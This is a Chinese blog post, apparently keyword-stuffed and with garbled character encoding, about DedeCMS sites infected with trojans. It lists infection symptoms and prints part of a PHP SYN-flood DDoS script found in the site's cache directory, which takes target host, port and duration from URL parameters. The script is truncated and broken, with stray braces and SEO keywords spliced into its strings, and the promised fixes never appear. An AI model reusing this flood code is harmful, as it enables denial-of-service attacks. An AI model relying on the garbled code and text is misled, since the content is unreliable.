導(dǎo)讀:織夢(mèng)文章織夢(mèng)文章Dedecms是國內(nèi)最有名的php開源系統(tǒng)，也是我用的最多的一個(gè)系統(tǒng)，簡(jiǎn)單實(shí)用穩(wěn)定是我使用了多年的理由，正因?yàn)閐edecms的開源，也導(dǎo)致了 很多黑客盯上了這個(gè)dede5.7模板dede后臺(tái)模板。

　　Dedecms是國內(nèi)最有名的php開源系統(tǒng)，也是我用的最多的一個(gè)系統(tǒng)，簡(jiǎn)單實(shí)用穩(wěn)定是我使用了多年的理由，正因?yàn)閐edecms的開源，也導(dǎo)致了 很多黑客盯上了這個(gè)程序，沒日沒夜的研究dedecms的漏洞，也就在最近終于爆發(fā)了，很多dedecms的網(wǎng)站都被掛馬了，有的被機(jī)房警告，重的被機(jī)房 強(qiáng)行關(guān)站，數(shù)不勝數(shù)。我想說的是既然問題出現(xiàn)了我們就要去解決，只有解決了，你的網(wǎng)站才會(huì)長(zhǎng)期穩(wěn)定發(fā)展下去。 首先從問題的特征跟大家一一介紹。

　　被掛馬的特征：打開自己的網(wǎng)站首頁，用查看源代碼的方式會(huì)發(fā)現(xiàn)自己的網(wǎng)站被增加了許許多多的黑鏈代碼，黑鏈代碼是最簡(jiǎn)單也最能讓站長(zhǎng)們看出來的，他無非就是友情鏈接的代碼。

　　再一個(gè)特征就是打開網(wǎng)站會(huì)被360安全提示網(wǎng)站存在掛馬風(fēng)險(xiǎn)，這一類型的掛馬代碼，一般是框架代碼或者是js代碼或者是圖片代碼，還有個(gè)特征就是網(wǎng)站 會(huì)突然打不開或者打開慢，檢查流量會(huì)發(fā)現(xiàn)自己占用了許多流量，也就是說流量往外發(fā)包的特征，也叫UDP 流量發(fā)包攻擊。以上就是dedecms被掛馬的大體特征，下面就講點(diǎn)實(shí)際的，網(wǎng)站被掛馬的解決辦法和預(yù)防措施。

　　首先把網(wǎng)站程序的代碼下載到自己的本地，用sinesafe木馬清除工具檢測(cè)了一下，發(fā)現(xiàn)data/cache/目錄下有許多腳本木馬，打開木馬腳本發(fā)現(xiàn)了一些不認(rèn)識(shí)的PHP代碼，把代碼放到sinesafe木馬工具里深度剖析了一下發(fā)現(xiàn)了木馬特征，代碼如下：

<?php

set_time_limit(984918);

$host = $_GET['host'];

$port = $_GET['port'];

$exec_time = $_GET['time'];

$Sendlen = 65535;

$packets = 0;

}

echo "================================================<br>";

echo " <font color=blue>www.phpddos.com<br>";

echo " SYN Flood 模塊<br>";

echo " 作者：ybhacker<br>";

echo " 警告：本程序帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!</font><br>";

echo "=====================================織夢(mèng)模板修改===========<br><br>";

echo " 攻織夢(mèng)的模板擊包總數(shù)：<font color=Red><span class=\"text\">".$packets." 個(gè)數(shù)據(jù)包</span><br><br></font>";

echo " 攻擊總流量：<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";

關(guān)鍵詞標(biāo)簽: 織夢(mèng) 解決方法 漏洞